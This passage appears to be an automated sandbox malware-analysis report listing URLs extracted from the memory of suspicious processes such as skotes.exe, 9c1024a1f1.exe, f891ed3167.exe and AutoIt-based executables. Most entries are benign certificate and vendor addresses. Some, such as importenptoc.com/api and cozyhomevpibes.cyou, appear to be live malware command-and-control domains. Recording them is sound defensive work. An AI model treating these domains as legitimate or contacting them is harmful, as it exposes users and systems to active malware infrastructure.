                                Source: powershell.exe, 00000006.00000002.22100471555.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22108124379.000001D344733000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: powershell.exe, 00000006.00000002.22100471555.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22108124379.000001D344733000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                Source: MSBuild.exe, 00000030.00000002.23300450970.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                Source: 7ecb69d7f1.exe, 00000011.00000000.22411971310.0000000000409000.00000002.00000001.01000000.00000014.sdmp, 7ecb69d7f1.exe, 00000011.00000002.22421328029.0000000000409000.00000002.00000001.01000000.00000014.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                Source: powershell.exe, 00000006.00000002.22116820974.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C8C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0A
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0X
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22355696927.0000000005A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                                Source: Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000002.22811935171.000000000139F000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microk
                                Source: Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microkke
                                Source: AchillesGuard.com, 00000022.00000002.22811935171.000000000139F000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microkkf
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C711000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23306198292.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
                                Source: Macromedia.com, 0000001D.00000002.22803107041.0000000000B45000.00000002.00000001.01000000.00000015.sdmp, Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000000.22464341551.0000000000DD5000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://www.digicert.com/CPS0
                                Source: powershell.exe, 00000006.00000002.22100471555.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22108124379.000001D344733000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBWr
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                                Source: powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.00000000013DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cozyhomevpibes.cyou/
                                Source: 33c3d7c7bd.exe, 00000023.00000002.22878664419.0000000000644000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictinvalid
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22339655455.00000000059F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22339269544.0000000005AA4000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22339655455.00000000059F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22339655455.00000000059F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
                                Source: powershell.exe, 00000006.00000002.22105137448.000000000539E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32D769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.00000000013EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/86
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.00000000013EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/P
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/P1X
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/Y
                                Source: f891ed3167.exe, 00000026.00000002.22712089220.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22709477311.000000000148C000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22709477311.0000000001474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/api
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/api9
                                Source: f891ed3167.exe, 00000026.00000002.22712089220.0000000003F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/apiL
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/atp6
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.00000000013EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/i
                                Source: f891ed3167.exe, 00000026.00000002.22709477311.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importenptoc.com/p
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324270428.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22323036090.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323326304.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323326304.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22323036090.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323326304.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22323326304.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22323036090.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323326304.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                                Source: powershell.exe, 00000006.00000002.22116820974.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C8C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
